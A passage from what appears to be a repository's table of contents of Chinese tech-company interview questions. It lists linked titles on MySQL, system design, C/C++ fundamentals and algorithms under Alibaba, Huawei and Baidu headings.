长度不能太长](01.阿里篇/1.1.6%20%E4%BB%8Einnodb%E7%9A%84%E7%B4%A2%E5%BC%95%E7%BB%93%E6%9E%84%E5%88%86%E6%9E%90%EF%BC%8C%E4%B8%BA%E4%BB%80%E4%B9%88%E7%B4%A2%E5%BC%95%E7%9A%84%20key%20%E9%95%BF%E5%BA%A6%E4%B8%8D%E8%83%BD%E5%A4%AA%E9%95%BF.md) ##### [1.1.7 MySQL的数据如何恢复到任意时间点?](01.阿里篇/1.1.7%20MySQL%E7%9A%84%E6%95%B0%E6%8D%AE%E5%A6%82%E4%BD%95%E6%81%A2%E5%A4%8D%E5%88%B0%E4%BB%BB%E6%84%8F%E6%97%B6%E9%97%B4%E7%82%B9%EF%BC%9F.md) ##### [1.1.8 什么是静态关联?什么是动态关联?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#304-%E4%BB%80%E4%B9%88%E6%98%AF%E9%9D%99%E6%80%81%E5%85%B3%E8%81%94%E4%BB%80%E4%B9%88%E6%98%AF%E5%8A%A8%E6%80%81%E5%85%B3%E8%81%94) ##### [1.1.9 输入 ping IP 后敲回车,发包前会发生什么?](01.阿里篇/1.1.9%20%E8%BE%93%E5%85%A5%20ping%20IP%20%E5%90%8E%E6%95%B2%E5%9B%9E%E8%BD%A6%EF%BC%8C%E5%8F%91%E5%8C%85%E5%89%8D%E4%BC%9A%E5%8F%91%E7%94%9F%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### [1.2.0 请解释下为什么鹿晗发布恋情的时候,微博系统会崩溃,如何解决?](01.阿里篇/1.2.0%20%E8%AF%B7%E8%A7%A3%E9%87%8A%E4%B8%8B%E4%B8%BA%E4%BB%80%E4%B9%88%E9%B9%BF%E6%99%97%E5%8F%91%E5%B8%83%E6%81%8B%E6%83%85%E7%9A%84%E6%97%B6%E5%80%99%EF%BC%8C%E5%BE%AE%E5%8D%9A%E7%B3%BB%E7%BB%9F%E4%BC%9A%E5%B4%A9%E6%BA%83%EF%BC%8C%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3%EF%BC%9F.md) ##### [1.2.1 现有一批邮件需要发送给订阅顾客,且有一个集群(集群的节点数不定,会动态扩容缩容)来负责具体的邮件发送任务,如何让系统尽快地完成发送?](01.阿里篇/1.2.1%20%E7%8E%B0%E6%9C%89%E4%B8%80%E6%89%B9%E9%82%AE%E4%BB%B6%E9%9C%80%E8%A6%81%E5%8F%91%E9%80%81%E7%BB%99%E8%AE%A2%E9%98%85%E9%A1%BE%E5%AE%A2%EF%BC%8C%E4%B8%94%E6%9C%89%E4%B8%80%E4%B8%AA%E9%9B%86%E7%BE%A4%EF%BC%88%E9%9B%86%E7%BE%A4%E7%9A%84%E8%8A%82%E7%82%B9%E6%95%B0%E4%B8%8D%E5%AE%9A%EF%BC%8C%E4%BC%9A%E5%8A%A8%E6%80%81%E6%89%A9%E5%AE%B9%E7%BC%A9%E5%AE%B9%EF%BC%89%E6%9D%A5%E8%B4%9F%E8%B4%A3%E5%85%B7%E4%BD%93%E7%9A%84%E9%82%AE%E4%BB%B6%E5%8F%91%E9%80%81%E4%BB%BB%E5%8A%A1%EF%BC%8C%E5%A6%82%E4%BD%95%E8%AE%A9%E7%B3%BB%E7%BB%9F%E5%B0%BD%E5%BF%AB%E5%9C%B0%E5%AE%8C%E6%88%90%E5%8F%91%E9%80%81%EF%BC%9F.md) ##### [1.2.2 有一批气象观测站,现需要获取这些站点的观测数据,并存储到 Hive 中。但是气象局只提供了 api 
查询,每次只能查询单个观测点。那么如果能够方便快速地获取到所有的观测点的数据?](01.阿里篇/1.2.2%20%E6%9C%89%E4%B8%80%E6%89%B9%E6%B0%94%E8%B1%A1%E8%A7%82%E6%B5%8B%E7%AB%99%EF%BC%8C%E7%8E%B0%E9%9C%80%E8%A6%81%E8%8E%B7%E5%8F%96%E8%BF%99%E4%BA%9B%E7%AB%99%E7%82%B9%E7%9A%84%E8%A7%82%E6%B5%8B%E6%95%B0%E6%8D%AE%EF%BC%8C%E5%B9%B6%E5%AD%98%E5%82%A8%E5%88%B0%20Hive%20%E4%B8%AD%E3%80%82%E4%BD%86%E6%98%AF%E6%B0%94%E8%B1%A1%E5%B1%80%E5%8F%AA%E6%8F%90%E4%BE%9B%E4%BA%86%20api%20%E6%9F%A5%E8%AF%A2%EF%BC%8C%E6%AF%8F%E6%AC%A1%E5%8F%AA%E8%83%BD%E6%9F%A5%E8%AF%A2%E5%8D%95%E4%B8%AA%E8%A7%82%E6%B5%8B%E7%82%B9%E3%80%82%E9%82%A3%E4%B9%88%E5%A6%82%E6%9E%9C%E8%83%BD%E5%A4%9F%E6%96%B9%E4%BE%BF%E5%BF%AB%E9%80%9F%E5%9C%B0%E8%8E%B7%E5%8F%96%E5%88%B0%E6%89%80%E6%9C%89%E7%9A%84%E8%A7%82%E6%B5%8B%E7%82%B9%E7%9A%84%E6%95%B0%E6%8D%AE%EF%BC%9F.md) ##### [1.2.3 如何实现两金额数据相加(最多小数点两位)](01.阿里篇/1.2.3%20%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B8%A4%E9%87%91%E9%A2%9D%E6%95%B0%E6%8D%AE%E7%9B%B8%E5%8A%A0%EF%BC%88%E6%9C%80%E5%A4%9A%E5%B0%8F%E6%95%B0%E7%82%B9%E4%B8%A4%E4%BD%8D%EF%BC%89.md) ##### [1.2.4 关于并行计算的一些基础开放问题](01.阿里篇/1.2.4%20%E5%85%B3%E4%BA%8E%E5%B9%B6%E8%A1%8C%E8%AE%A1%E7%AE%97%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9F%BA%E7%A1%80%E5%BC%80%E6%94%BE%E9%97%AE%E9%A2%98.md) ##### [1.2.5 请计算XILINX公司VU9P芯片的算力相当于多少TOPS,给出计算过程与公式](01.阿里篇/1.2.5%20%E8%AF%B7%E8%AE%A1%E7%AE%97XILINX%E5%85%AC%E5%8F%B8VU9P%E8%8A%AF%E7%89%87%E7%9A%84%E7%AE%97%E5%8A%9B%E7%9B%B8%E5%BD%93%E4%BA%8E%E5%A4%9A%E5%B0%91TOPS%EF%BC%8C%E7%BB%99%E5%87%BA%E8%AE%A1%E7%AE%97%E8%BF%87%E7%A8%8B%E4%B8%8E%E5%85%AC%E5%BC%8F.md) ##### [1.2.6 一颗现代处理器,每秒大概可以执行多少条简单的MOV指令,有哪些主要的影响因素](01.阿里篇/1.2.6%20%E4%B8%80%E9%A2%97%E7%8E%B0%E4%BB%A3%E5%A4%84%E7%90%86%E5%99%A8%EF%BC%8C%E6%AF%8F%E7%A7%92%E5%A4%A7%E6%A6%82%E5%8F%AF%E4%BB%A5%E6%89%A7%E8%A1%8C%E5%A4%9A%E5%B0%91%E6%9D%A1%E7%AE%80%E5%8D%95%E7%9A%84MOV%E6%8C%87%E4%BB%A4%EF%BC%8C%E6%9C%89%E5%93%AA%E4%BA%9B%E4%B8%BB%E8%A6%81%E7%9A%84%E5%BD%B1%E5%93%8D%E5%9B%A0%E7%B4%A0.md) ##### [1.2.7 请分析 MaxCompute 产品与分布式技术的关系、当前大数据计算平台类产品的市场现状和发展趋势](01.阿里篇/1.2.7%20%E8%AF%B7%E5%88%86%E6%9E%90%20MaxCompute%20%E4%BA%A7%E5%93%81%E4%B8%8E%E5%88%86%E5%B8%83%E5%BC%8F%E6%8A%80%E6%9C%AF%E7%9A%84%E5%85%B3%E7%B3%BB%E3%80%81%E5%BD%93%E5%89%8D%E5%A4%A7%E6%95%B0%E6%8D%AE%E8%AE%A1%E7%AE%97%E5%B9%B3%E5%8F%B0%E7%B1%BB%E4%BA%A7%E5%93%81%E7%9A%84%E5%B8%82%E5%9C%BA%E7%8E%B0%E7%8A%B6%E5%92%8C%E5%8F%91%E5%B1%95%E8%B6%8B%E5%8A%BF.md) ##### [1.2.8 对大数据平台中的元数据管理是怎么理解的,元数据收集管理体系是怎么样的,会对大数据应用有什么样的影响](01.阿里篇/1.2.8%20%E5%AF%B9%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E4%B8%AD%E7%9A%84%E5%85%83%E6%95%B0%E6%8D%AE%E7%AE%A1%E7%90%86%E6%98%AF%E6%80%8E%E4%B9%88%E7%90%86%E8%A7%A3%E7%9A%84%EF%BC%8C%E5%85%83%E6%95%B0%E6%8D%AE%E6%94%B6%E9%9B%86%E7%AE%A1%E7%90%86%E4%BD%93%E7%B3%BB%E6%98%AF%E6%80%8E%E4%B9%88%E6%A0%B7%E7%9A%84%EF%BC%8C%E4%BC%9A%E5%AF%B9%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BA%94%E7%94%A8%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E5%BD%B1%E5%93%8D.md) ##### [1.2.9 你理解常见如阿里,和友商大数据平台的技术体系差异以及发展趋势和技术瓶颈,在存储和计算两个方面进行概述](01.阿里篇/1.2.9%20%E4%BD%A0%E7%90%86%E8%A7%A3%E5%B8%B8%E8%A7%81%E5%A6%82%E9%98%BF%E9%87%8C%EF%BC%8C%E5%92%8C%E5%8F%8B%E5%95%86%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E7%9A%84%E6%8A%80%E6%9C%AF%E4%BD%93%E7%B3%BB%E5%B7%AE%E5%BC%82%E4%BB%A5%E5%8F%8A%E5%8F%91%E5%B1%95%E8%B6%8B%E5%8A%BF%E5%92%8C%E6%8A%80%E6%9C%AF%E7%93%B6%E9%A2%88%EF%BC%8C%E5%9C%A8%E5%AD%98%E5%82%A8%E5%92%8C%E8%AE%A1%E7%AE%97%E4%B8%A4%E4%B8%AA%E6%96%B9%E9%9D%A2%E8%BF%9B%E8%A1%8C%E6%A6%82%E8%BF%B0.md) ##### [1.3.0 
虚函数是如何实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#305-%E8%99%9A%E5%87%BD%E6%95%B0%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [1.3.1 最大频率栈](01.阿里篇/1.3.1%20%E6%9C%80%E5%A4%A7%E9%A2%91%E7%8E%87%E6%A0%88.md) ##### [1.3.2 给定一个链表,删除链表的倒数第N个节点,并且返回链表的头结点](01.阿里篇/1.3.2%20%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E9%93%BE%E8%A1%A8%EF%BC%8C%E5%88%A0%E9%99%A4%E9%93%BE%E8%A1%A8%E7%9A%84%E5%80%92%E6%95%B0%E7%AC%ACN%E4%B8%AA%E8%8A%82%E7%82%B9%EF%BC%8C%E5%B9%B6%E4%B8%94%E8%BF%94%E5%9B%9E%E9%93%BE%E8%A1%A8%E7%9A%84%E5%A4%B4%E7%BB%93%E7%82%B9.md) ##### [1.3.3 如果让你设计一个通用的、支持各种数据库秒级备份和恢复的系统,你会如何设计](01.阿里篇/1.3.3%20%E5%A6%82%E6%9E%9C%E8%AE%A9%E4%BD%A0%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E9%80%9A%E7%94%A8%E7%9A%84%E3%80%81%E6%94%AF%E6%8C%81%E5%90%84%E7%A7%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E7%A7%92%E7%BA%A7%E5%A4%87%E4%BB%BD%E5%92%8C%E6%81%A2%E5%A4%8D%E7%9A%84%E7%B3%BB%E7%BB%9F%EF%BC%8C%E4%BD%A0%E4%BC%9A%E5%A6%82%E4%BD%95%E8%AE%BE%E8%AE%A1.md) ##### [1.3.4 如果让你来设计一个支持数据库、NOSQL 和大数据之间数据实时流动的数据流及处理的系统,你会考虑哪些问题?如何设计?](01.阿里篇/1.3.4%20%E5%A6%82%E6%9E%9C%E8%AE%A9%E4%BD%A0%E6%9D%A5%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E6%94%AF%E6%8C%81%E6%95%B0%E6%8D%AE%E5%BA%93%E3%80%81NOSQL%20%E5%92%8C%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B9%8B%E9%97%B4%E6%95%B0%E6%8D%AE%E5%AE%9E%E6%97%B6%E6%B5%81%E5%8A%A8%E7%9A%84%E6%95%B0%E6%8D%AE%E6%B5%81%E5%8F%8A%E5%A4%84%E7%90%86%E7%9A%84%E7%B3%BB%E7%BB%9F%EF%BC%8C%E4%BD%A0%E4%BC%9A%E8%80%83%E8%99%91%E5%93%AA%E4%BA%9B%E9%97%AE%E9%A2%98%EF%BC%9F%E5%A6%82%E4%BD%95%E8%AE%BE%E8%AE%A1%EF%BC%9F.md) ##### [1.3.5 给定一个整数数组和一个整数,返回两个数组的索引,这两个索引指向的数字的加和等于指定的整数。需要最优的算法,分析算法的空间和时间复杂度](01.阿里篇/1.3.5%20%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0%E6%95%B0%E7%BB%84%E5%92%8C%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0%EF%BC%8C%E8%BF%94%E5%9B%9E%E4%B8%A4%E4%B8%AA%E6%95%B0%E7%BB%84%E7%9A%84%E7%B4%A2%E5%BC%95%EF%BC%8C%E8%BF%99%E4%B8%A4%E4%B8%AA%E7%B4%A2%E5%BC%95%E6%8C%87%E5%90%91%E7%9A%84%E6%95%B0%E5%AD%97%E7%9A%84%E5%8A%A0%E5%92%8C%E7%AD%89%E4%BA%8E%E6%8C%87%E5%AE%9A%E7%9A%84%E6%95%B4%E6%95%B0%E3%80%82%E9%9C%80%E8%A6%81%E6%9C%80%E4%BC%98%E7%9A%84%E7%AE%97%E6%B3%95%EF%BC%8C%E5%88%86%E6%9E%90%E7%AE%97%E6%B3%95%E7%9A%84%E7%A9%BA%E9%97%B4%E5%92%8C%E6%97%B6%E9%97%B4%E5%A4%8D%E6%9D%82%E5%BA%A6.md) ##### [1.3.6 假如给你一个新产品,你将从哪些方面来保障它的质量?](01.阿里篇/1.3.6%20%E5%81%87%E5%A6%82%E7%BB%99%E4%BD%A0%E4%B8%80%E4%B8%AA%E6%96%B0%E4%BA%A7%E5%93%81%EF%BC%8C%E4%BD%A0%E5%B0%86%E4%BB%8E%E5%93%AA%E4%BA%9B%E6%96%B9%E9%9D%A2%E6%9D%A5%E4%BF%9D%E9%9A%9C%E5%AE%83%E7%9A%84%E8%B4%A8%E9%87%8F%EF%BC%9F.md) ##### [1.3.7 请评估一下程序的执行结果?](01.阿里篇/1.3.7%20%E8%AF%B7%E8%AF%84%E4%BC%B0%E4%B8%80%E4%B8%8B%E7%A8%8B%E5%BA%8F%E7%9A%84%E6%89%A7%E8%A1%8C%E7%BB%93%E6%9E%9C%EF%BC%9F.md) <br> <h3 id="2">华为篇</h3> --- ##### [2.1.0 static有什么用途?(请至少说明两种)](https://github.com/0voice/interview_internal_reference/blob/master/02.%E5%8D%8E%E4%B8%BA%E7%AF%87/2.1.1%20static%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94%EF%BC%9F%EF%BC%88%E8%AF%B7%E8%87%B3%E5%B0%91%E8%AF%B4%E6%98%8E%E4%B8%A4%E7%A7%8D%EF%BC%89.md) ##### [2.1.1 变量的声明和定义有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#1%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.1.2 sizeof 和 strlen 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#3sizeof-%E5%92%8C-strlen-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.1.3 C 语言的关键字 static 和 C++ 的关键字 static 
有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#4c-%E8%AF%AD%E8%A8%80%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97-static-%E5%92%8C-c-%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97-static-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.1.4 C中的 malloc 和C++中的 new 有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#5%EF%BD%83%E4%B8%AD%E7%9A%84-malloc-%E5%92%8C%EF%BD%83%E4%B8%AD%E7%9A%84-new-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.1.5 写一个“标准”宏 MIN](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#6%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8F-min) ##### [2.1.6 一个指针可以是 volatile 吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#7%E4%B8%80%E4%B8%AA%E6%8C%87%E9%92%88%E5%8F%AF%E4%BB%A5%E6%98%AF-volatile-%E5%90%97) ##### [2.1.7 a 和&a 有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#8a-%E5%92%8Ca-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.1.8 简述 C、C++程序编译的内存分配情况](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#9%E7%AE%80%E8%BF%B0-cc%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%83%85%E5%86%B5) ##### [2.1.9 简述 strcpy、sprintf 与 memcpy 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#10%E7%AE%80%E8%BF%B0-strcpysprintf-%E4%B8%8E-memcpy-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.2.0 设置地址为 0x67a9 的整型变量的值为 0xaa66](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#11%E8%AE%BE%E7%BD%AE%E5%9C%B0%E5%9D%80%E4%B8%BA-0x67a9-%E7%9A%84%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8F%E7%9A%84%E5%80%BC%E4%B8%BA-0xaa66) ##### [2.2.1 面向对象的三大特征](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#12%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E4%B8%89%E5%A4%A7%E7%89%B9%E5%BE%81) ##### [2.2.2 C++的空类有哪些成员函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#13c%E7%9A%84%E7%A9%BA%E7%B1%BB%E6%9C%89%E5%93%AA%E4%BA%9B%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0) ##### [2.2.3 谈谈你对拷贝构造函数和赋值运算符的认识](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#14%E8%B0%88%E8%B0%88%E4%BD%A0%E5%AF%B9%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E8%B5%8B%E5%80%BC%E8%BF%90%E7%AE%97%E7%AC%A6%E7%9A%84%E8%AE%A4%E8%AF%86) ##### [2.2.4 用 C++设计一个不能被继承的类](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#15%E7%94%A8-c%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E4%B8%8D%E8%83%BD%E8%A2%AB%E7%BB%A7%E6%89%BF%E7%9A%84%E7%B1%BB) ##### [2.2.5 访问基类的私有虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#16%E8%AE%BF%E9%97%AE%E5%9F%BA%E7%B1%BB%E7%9A%84%E7%A7%81%E6%9C%89%E8%99%9A%E5%87%BD%E6%95%B0) ##### [2.2.6 简述类成员函数的重写、重载和隐藏的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#17%E7%AE%80%E8%BF%B0%E7%B1%BB%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E7%9A%84%E9%87%8D%E5%86%99%E9%87%8D%E8%BD%BD%E5%92%8C%E9%9A%90%E8%97%8F%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.2.7 简述多态实现的原理](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#18%E7%AE%80%E8%BF%B0%E5%A4%9A%E6%80%81%E5%AE%9E%E7%8E%B0%E7%9A%84%E5%8E%9F%E7%90%86) ##### [2.2.8 链表和数组有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#19%E9%93%BE%E8%A1%A8%E5%92%8C%E6%95%B0%E7%BB%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.2.9 
怎样把一个单链表反序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#20%E6%80%8E%E6%A0%B7%E6%8A%8A%E4%B8%80%E4%B8%AA%E5%8D%95%E9%93%BE%E8%A1%A8%E5%8F%8D%E5%BA%8F) ##### [2.3.0 简述队列和栈的异同](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#21%E7%AE%80%E8%BF%B0%E9%98%9F%E5%88%97%E5%92%8C%E6%A0%88%E7%9A%84%E5%BC%82%E5%90%8C) ##### [2.3.1 能否用两个栈实现一个队列的功能](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#22%E8%83%BD%E5%90%A6%E7%94%A8%E4%B8%A4%E4%B8%AA%E6%A0%88%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E9%98%9F%E5%88%97%E7%9A%84%E5%8A%9F%E8%83%BD) ##### [2.3.2 计算一颗二叉树的深度](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#23%E8%AE%A1%E7%AE%97%E4%B8%80%E9%A2%97%E4%BA%8C%E5%8F%89%E6%A0%91%E7%9A%84%E6%B7%B1%E5%BA%A6) ##### [2.3.3 编码实现直接插入排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#24%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E7%9B%B4%E6%8E%A5%E6%8F%92%E5%85%A5%E6%8E%92%E5%BA%8F) ##### [2.3.4 编码实现冒泡排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#25%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E5%86%92%E6%B3%A1%E6%8E%92%E5%BA%8F) ##### [2.3.5 编码实现直接选择排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#26%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E7%9B%B4%E6%8E%A5%E9%80%89%E6%8B%A9%E6%8E%92%E5%BA%8F) ##### [2.3.6 编程实现堆排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#27%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E5%A0%86%E6%8E%92%E5%BA%8F) ##### [2.3.7 编程实现基数排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#28%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E5%9F%BA%E6%95%B0%E6%8E%92%E5%BA%8F) ##### [2.3.8 谈谈你对编程规范的理解或认识](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#29%E8%B0%88%E8%B0%88%E4%BD%A0%E5%AF%B9%E7%BC%96%E7%A8%8B%E8%A7%84%E8%8C%83%E7%9A%84%E7%90%86%E8%A7%A3%E6%88%96%E8%AE%A4%E8%AF%86) ##### [2.3.9 short i = 0; i = i + 1L;这两句有错吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#30short-i--0-i--i--1l%E8%BF%99%E4%B8%A4%E5%8F%A5%E6%9C%89%E9%94%99%E5%90%97) ##### [2.4.0 &&和&、||和|有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#31%E5%92%8C%E5%92%8C%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.4.1 C++的引用和 C 语言的指针有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#32c%E7%9A%84%E5%BC%95%E7%94%A8%E5%92%8C-c-%E8%AF%AD%E8%A8%80%E7%9A%84%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.4.2 在二元树中找出和为某一值的所有路径](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#33%E5%9C%A8%E4%BA%8C%E5%85%83%E6%A0%91%E4%B8%AD%E6%89%BE%E5%87%BA%E5%92%8C%E4%B8%BA%E6%9F%90%E4%B8%80%E5%80%BC%E7%9A%84%E6%89%80%E6%9C%89%E8%B7%AF%E5%BE%84) ##### [2.4.3 typedef 和 define 有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#35typedef-%E5%92%8C-define-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.4.4 关键字 const 是什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#36%E5%85%B3%E9%94%AE%E5%AD%97-const-%E6%98%AF%E4%BB%80%E4%B9%88) ##### [2.4.5 static 有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#37static-%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [2.4.6 extern 
有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#38extern-%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [2.4.7 流操作符重载为什么返回引用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#39%E6%B5%81%E6%93%8D%E4%BD%9C%E7%AC%A6%E9%87%8D%E8%BD%BD%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%94%E5%9B%9E%E5%BC%95%E7%94%A8) ##### [2.4.8 简述指针常量与常量指针区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#40%E7%AE%80%E8%BF%B0%E6%8C%87%E9%92%88%E5%B8%B8%E9%87%8F%E4%B8%8E%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E5%8C%BA%E5%88%AB) ##### [2.4.9 数组名和指针的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#41%E6%95%B0%E7%BB%84%E5%90%8D%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.5.0 如何避免“野指针”](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#42%E5%A6%82%E4%BD%95%E9%81%BF%E5%85%8D%E9%87%8E%E6%8C%87%E9%92%88) ##### [2.5.1 常引用有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#43%E5%B8%B8%E5%BC%95%E7%94%A8%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [2.5.2 编码实现字符串转化为数字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#44%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BD%AC%E5%8C%96%E4%B8%BA%E6%95%B0%E5%AD%97) ##### [2.5.3 简述 strcpy、sprintf 与 memcpy 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#45%E7%AE%80%E8%BF%B0-strcpysprintf-%E4%B8%8E-memcpy-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.5.4 用 C 编写一个死循环程序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#46%E7%94%A8-c-%E7%BC%96%E5%86%99%E4%B8%80%E4%B8%AA%E6%AD%BB%E5%BE%AA%E7%8E%AF%E7%A8%8B%E5%BA%8F) ##### [2.5.5 编码实现某一变量某位清 0 或置 1](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#47%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E6%9F%90%E4%B8%80%E5%8F%98%E9%87%8F%E6%9F%90%E4%BD%8D%E6%B8%85-0-%E6%88%96%E7%BD%AE-1) ##### [2.5.6 评论下面这个中断函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#48%E8%AF%84%E8%AE%BA%E4%B8%8B%E9%9D%A2%E8%BF%99%E4%B8%AA%E4%B8%AD%E6%96%AD%E5%87%BD%E6%95%B0) ##### [2.5.7 构造函数能否为虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#49%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%83%BD%E5%90%A6%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [2.5.8 谈谈你对面向对象的认识](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#50%E8%B0%88%E8%B0%88%E4%BD%A0%E5%AF%B9%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E8%AE%A4%E8%AF%86) ##### [2.5.9 动态库和静态库的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#67%E5%8A%A8%E6%80%81%E5%BA%93%E5%92%8C%E9%9D%99%E6%80%81%E5%BA%93%E7%9A%84%E5%8C%BA%E5%88%AB) <br> <h3 id="3">百度篇</h3> --- ##### [3.1.0 提高c++性能,你用过哪些方式去提升](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#68%E6%8F%90%E9%AB%98c%E6%80%A7%E8%83%BD%E4%BD%A0%E7%94%A8%E8%BF%87%E5%93%AA%E4%BA%9B%E6%96%B9%E5%BC%8F%E5%8E%BB%E6%8F%90%E5%8D%87) ##### [3.1.1 